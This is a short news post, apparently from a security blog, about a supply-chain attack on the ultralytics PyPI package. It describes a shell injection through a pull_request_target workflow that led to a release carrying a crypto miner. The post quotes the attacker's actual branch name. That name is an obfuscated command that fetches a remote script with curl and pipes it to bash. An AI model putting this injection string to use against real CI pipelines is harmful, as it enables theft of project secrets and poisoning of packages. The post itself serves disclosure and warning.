Abusing Git branch names to compromise a PyPI package

A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script.The GitHub account "OpenIM Robot"(which appears to be controlled byXinwei Xiong) openeda pull request for the ultralyticsPython package. The pull request included a suspicious Git branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Unfortunately, ultralytics uses thepull_request_target GitHub Action trigger to automate some of its continuous-integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets - but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already removed the malicious script.

This problem has beenknown for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.